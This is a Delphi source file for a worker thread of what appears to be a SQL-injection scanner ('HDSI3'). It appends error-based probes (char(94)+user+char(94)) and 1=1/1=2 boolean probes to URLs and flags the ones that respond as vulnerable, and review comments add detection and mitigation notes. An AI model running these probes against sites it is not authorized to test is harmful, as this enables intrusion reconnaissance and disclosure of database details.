
📄 thread_sclin.pas

📁 sql inject HDSI3--delphi.rar
unit thread_sclin;

interface

uses
  Classes;

type
  // Worker thread that checks one URL for SQL-injection indicators and
  // records a per-URL verdict in the main form's result list box.
  Sclin_Thread = class(TThread)
   // URL under test. Declared before any visibility keyword, so it is not
   // private; presumably the creator assigns it before the thread runs
   // (the assignment is not visible in this unit).
   FURL:string;
  private
    { Private declarations }
    // Error-based check: returns 1..3 for the first probe form that
    // GetURLMsgBool accepts, 0 if none does.
    function IfErrorReport(str_url:string):integer;
    // Boolean-differential check: returns 1..3 for the first probe pair that
    // yields HTTP 200 for the "1=1" form and HTTP 500 for the "1=2" form,
    // 0 if none does.
    function Inject_method(str_url:string):integer;
  protected
    // Thread entry point: runs both checks on FURL and reports the verdict.
    procedure Execute; override;
  end;

implementation
uses
main_unit,define_unit;

{ Important: Methods and properties of objects in visual components can only be
  used in a method called using Synchronize, for example,

      Synchronize(UpdateCaption);

  and UpdateCaption could look like,

    procedure Sclin_Thread.UpdateCaption;
    begin
      Form1.Caption := 'Updated in a thread';
    end; }

{ Sclin_Thread }

procedure Sclin_Thread.Execute;
var
  verdict: string;
begin
  // Honour the stop flag on the main form before issuing any request.
  if Form_main.stop_clin = True then
    Exit;

  // Default verdict is "[否]" (no); either check returning > 0 flips it to
  // "[是]" (yes). The differential check only runs when the error-based
  // check found nothing, so a positive URL costs fewer requests.
  verdict := '[否]';
  if IfErrorReport(FURL) > 0 then
    verdict := '[是]'
  else if Inject_method(FURL) > 0 then
    verdict := '[是]';

  // NOTE(review): the list box is updated directly from the worker thread.
  // This unit's own template comment states that visual-component members
  // should only be used from a method invoked through Synchronize.
  Form_main.ListBoxMRe.Items.Add(verdict + FURL);
end;



//******************************************************************************
// Determine the injection form and whether the server reports an error.
//
// Appends each of three URL-encoded suffixes to str_url and asks
// define_unit.GetURLMsgBool about the resulting URL. Returns the 1-based index
// of the first suffix for which GetURLMsgBool returns True, or 0 if none does.
// The suffixes differ only in quoting: bare (1), single-quote wrapped (2) and
// "%'" wrapped (3) -- these appear to correspond to numeric, string and LIKE
// query contexts.
//
// NOTE(review): GetURLMsgBool is defined elsewhere; presumably it looks for a
// database error message in the response body -- confirm in define_unit.
//
// Defender's view: every probe contains the literal "char(94)%2Buser%2Bchar(94))>0"
// (%2B decodes to "+"), a string-to-integer comparison. That token in a query
// string is a stable access-log / WAF signature. Parameterized queries and
// suppressing verbose database errors to clients remove the signal this
// check depends on.
function Sclin_Thread.IfErrorReport(str_url:string):integer;
const
  ERROR_PROBES: array[1..3] of string = (
    '%20and(char(94)%2Buser%2Bchar(94))>0',
    '''%20and(char(94)%2Buser%2Bchar(94))>0%20and%20''''=''',
    '%25''%20and(char(94)%2Buser%2Bchar(94))>0%20and%20''%25''='''
  );
var
  idx: Integer;
begin
  Result := 0;
  // Probes are tried in order; the first hit decides the return value and
  // no further requests are made.
  for idx := Low(ERROR_PROBES) to High(ERROR_PROBES) do
    if define_unit.GetURLMsgBool(str_url + ERROR_PROBES[idx]) then
    begin
      Result := idx;
      Exit;
    end;
end;


//******************************************************************************
// Boolean-differential check on str_url.
//
// For each of three quoting forms (bare, single-quote wrapped, "%'" wrapped)
// a suffix ending in "1=1" and a suffix ending in "1=2" are appended to
// str_url. Returns the 1-based index of the first form for which
// define_unit.GetURLCode yields 200 for the "1=1" URL and 500 for the "1=2"
// URL, or 0 if no form matches.
//
// NOTE(review): only the exact 200/500 status pair counts as a hit, so an
// application that answers a false condition with 200 and different content
// is reported as negative by this check.
//
// Defender's view: the traffic pattern is back-to-back requests to the same
// URL that differ only in "And%201=1" versus "And%201=2". Correlating such
// pairs per client in access logs is a practical detection; parameterized
// queries and a uniform error response remove the 200/500 differential.
function Sclin_Thread.Inject_method(str_url:string):integer;
const
  TRUE_PROBES: array[1..3] of string = (
    '%20And%201=1',
    '''%20And%201=1%20And%20''''=''',
    '%25''%20And%201=1%20And%20''%25''='''
  );
  FALSE_PROBES: array[1..3] of string = (
    '%20And%201=2',
    '''%20And%201=2%20And%20''''=''',
    '%25''%20And%201=2%20And%20''%25''='''
  );
var
  idx: Integer;
begin
  Result := 0;
  // Same left-to-right "and" of the two status comparisons as before; the
  // first matching form wins and ends the scan.
  for idx := 1 to 3 do
    if (define_unit.GetURLCode(str_url + TRUE_PROBES[idx]) = 200) and
       (define_unit.GetURLCode(str_url + FALSE_PROBES[idx]) = 500) then
    begin
      Result := idx;
      Exit;
    end;
end;
end.
